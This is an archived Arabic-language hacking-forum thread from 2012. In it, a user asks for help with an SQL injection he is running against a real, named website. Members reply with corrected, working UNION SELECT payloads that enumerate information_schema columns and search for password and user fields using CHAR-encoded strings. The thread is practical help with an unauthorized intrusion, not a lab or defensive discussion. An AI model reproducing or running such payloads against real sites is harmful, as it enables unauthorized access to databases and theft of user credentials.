:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   [مشكلة] مساعدة بخصوص حقن موقع (http://www.vbspiders.com/vb/showthread.php?t=65690)

Senor os 11-18-2012 01:32 AM
مساعدة بخصوص حقن موقع
 
السلام عليكم المرجو المساعدة : كنت اقوم باختراق موقع لكن عندما وصلت الى where+column_name+LIKE+%pas% لا يظهر لي اي شيء ، ما الحل ؟؟؟

PortoMan 11-18-2012 11:49 AM
رد: maestro-23@hotmail.fr
 
حبيبى حاول تعتمد على الحقن ببرامج لانه اسرع وافضل
اما بالنسبة الى امر الحقن اليدوى الذى قمت انت بكتباتة فهذا تقريبا يعتبر امر من الامور التى يمكن ان يكون معمول لها ايقاف او باند لانها ليست ضرورية فى استحضار البيانات من جداول SQL لو كنت تتعمال مع اوركال اقولك ناقصك بس تكتب فى اخر الامر ++ وكان يعمل معك .
"الخلاصة اعتقد ان الامر دا تم اقافة من قائمة الجداول فى SQL " والله اعلم

maestro-23 11-18-2012 03:59 PM
رد: maestro-23@hotmail.fr
 
:icon30: شكرآا لك اخي الكريم

aircrack -ng 11-18-2012 04:56 PM
رد: maestro-23@hotmail.fr
 
اقتباس:
المشاركة الأصلية كتبت بواسطة PortoMan (المشاركة 453393)
حبيبى حاول تعتمد على الحقن ببرامج لانه اسرع وافضل
اما بالنسبة الى امر الحقن اليدوى الذى قمت انت بكتباتة فهذا تقريبا يعتبر امر من الامور التى يمكن ان يكون معمول لها ايقاف او باند لانها ليست ضرورية فى استحضار البيانات من جداول SQL لو كنت تتعمال مع اوركال اقولك ناقصك بس تكتب فى اخر الامر ++ وكان يعمل معك .
"الخلاصة اعتقد ان الامر دا تم اقافة من قائمة الجداول فى SQL " والله اعلم
توضيح فقط اخي
هو طلب جدول يكون احد حقوله كلمة pass او شبيهة لها لكن احقول لاتحتوي على كلمة pass لانو اغلبهم يغير لمحتى اخر
والشيء الثاني البرامج هي الي تعطيك الباند لانو تتعامل مع القواعد بالزياده

googles 11-18-2012 06:46 PM
رد: maestro-23@hotmail.fr
 
المرجوا منك التوضيح أكثر :
ضع الرابط كامل واحدف فقط اسم الموقع اذا كنت لا تريد أن يراه أحد.
لنتمكن من مساعدتك

maestro-23 11-19-2012 01:50 AM
رد: maestro-23@hotmail.fr
 
ها هو الرابط يا اخي ، و شكرا على مساعدتكم :
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

googles 11-19-2012 09:09 PM
رد: maestro-23@hotmail.fr
 
ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :
كود PHP:
www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(371129711511537)-- 
أنظر هذا هو الامر الصحيح :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)-- 
اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :
كود PHP:
http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)-- 
وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية :icon30:
تحياتي .

mido868 11-19-2012 11:50 PM
رد: مساعدة بخصوص حقن موقع
 
تم تعديل العنوان ومرة أخرى لا تضع بريدك الالكترونى فى المشاركة ضد قوانين القسم
يــــــــغــــــــلـــــــــــــــــــق


الساعة الآن 12:29 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0